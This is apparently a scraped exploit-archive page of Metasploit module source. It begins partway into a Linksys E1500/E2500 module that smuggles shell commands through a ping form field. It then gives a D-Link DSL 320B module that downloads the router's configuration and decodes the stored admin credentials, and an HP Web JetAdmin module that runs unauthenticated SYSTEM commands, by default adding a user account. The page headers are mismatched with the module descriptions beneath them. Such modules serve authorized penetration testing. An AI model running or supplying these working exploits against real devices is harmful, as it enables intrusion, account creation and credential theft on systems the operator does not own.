#{uri}")    begin      res = send_request_cgi({        'uri' => uri,        'method' => 'POST',        'authorization' => basic_auth(user, pass),        'vars_post' => {          'submit_button' => 'Diagnostics',          'change_action' => 'gozila_cgi',          'submit_type' => 'start_ping',          'action' => '',          'commit' => '0',          'ping_ip' => '1.1.1.1',          'ping_size' => "&#{cmd}&",          'ping_times' => '5',          'traceroute_ip' => ''        }      })    rescue ::Rex::ConnectionError      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")      return    end    print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")    print_status("#{rhost}:#{rport} - Blind Exploitation - wait around 10 seconds till the command gets executed")  endend

Linksys E1500/E2500 Remote Command Execution

This Metasploit module exploits an authentication bypass vulnerability in D-Link DSL 320B less than or equal tov1.23. This vulnerability allows to extract the credentials for the remote management interface.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  def initialize    super(      'Name' => 'D-Link DSL 320B Password Extractor',      'Description' => %q{          This module exploits an authentication bypass vulnerability in D-Link DSL 320B        <=v1.23. This vulnerability allows to extract the credentials for the remote        management interface.      },      'References' => [        [ 'EDB', '25252' ],        [ 'OSVDB', '93013' ],        [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ]      ],      'Author' => [        'Michael Messner <devnull[at]s3cur1ty.de>'      ],      'License' => MSF_LICENSE    )  end  def run    vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device")    # download configuration    begin      res = send_request_cgi({        'uri' => '/config.bin',        'method' => 'GET'      })      return if res.nil?      return if (res.headers['Server'].nil? || res.headers['Server'] !~ (/micro_httpd/))      return if (res.code == 404)      if res.body =~ (/sysPassword value/) || res.body =~ (/sysUserName value/)        if res.body !~ /sysPassword value/          print_status("#{rhost}:#{rport} - Default Configuration of DSL 320B detected - no password section available, try admin/admin")        else          print_good("#{rhost}:#{rport} - Credentials successfully extracted")        end        # store all details as loot -> there is some useful stuff in the response        loot = store_loot('dlink.dsl320b.config', 'text/plain', rhost, res.body)        print_good("#{rhost}:#{rport} - Configuration of DSL 320B downloaded to: #{loot}")        user = ''        pass = ''        res.body.each_line do |line|          if line =~ %r{<sysUserName\ value="(.*)"/>}            user = ::Regexp.last_match(1)            next          end          next unless line =~ %r{<sysPassword\ value="(.*)"/>}          pass = ::Regexp.last_match(1)          pass = Rex::Text.decode_base64(pass)          print_good("#{rhost}:#{rport} - Credentials found: #{user} / #{pass}")          connection_details = {            module_fullname: fullname,            username: user,            private_data: pass,            private_type: :password,            workspace_id: myworkspace_id,            proof: line,            status: Metasploit::Model::Login::Status::UNTRIED          }.merge(service_details)          create_credential_and_login(connection_details)        end      end    rescue ::Rex::ConnectionError      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")      return    end  endend

D-Link DSL 320B Password Extractor

This Metasploit module abuses a command execution vulnerability within the web based management console of the Hewlett-Packard Web JetAdmin network printer tool v6.2 - v6.5. It is possible to execute commands as SYSTEM without authentication. The vulnerability also affects POSIX systems, however at this stage the module only works against Windows. This Metasploit module does not apply to HP printers.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'HP Web JetAdmin 6.5 Server Arbitrary Command Execution',        'Description' => %q{          This module abuses a command execution vulnerability within the          web based management console of the Hewlett-Packard Web JetAdmin          network printer tool v6.2 - v6.5. It is possible to execute commands          as SYSTEM without authentication. The vulnerability also affects POSIX          systems, however at this stage the module only works against Windows.          This module does not apply to HP printers.        },        'Author' => [ 'aushack' ],        'License' => MSF_LICENSE,        'References' => [          [ 'OSVDB', '5798' ],          [ 'BID', '10224' ],          # [ 'CVE', '' ],# No CVE!          [ 'EDB', '294' ]        ],        'DisclosureDate' => '2004-04-27'      )    )    register_options(      [        Opt::RPORT(8000),        OptString.new('CMD', [ false, 'The command to execute.', 'net user metasploit password /add' ]),      ]    )  end  def run    cmd = datastore['CMD'].gsub(' ', ',')    send_request_cgi({      'uri' => '/plugins/framework/script/content.hts',      'method' => 'POST',      'data' => 'obj=Httpd:ExecuteFile(,cmd.exe,/c,' + cmd + ',)'    }, 3)  endend

Tag

#git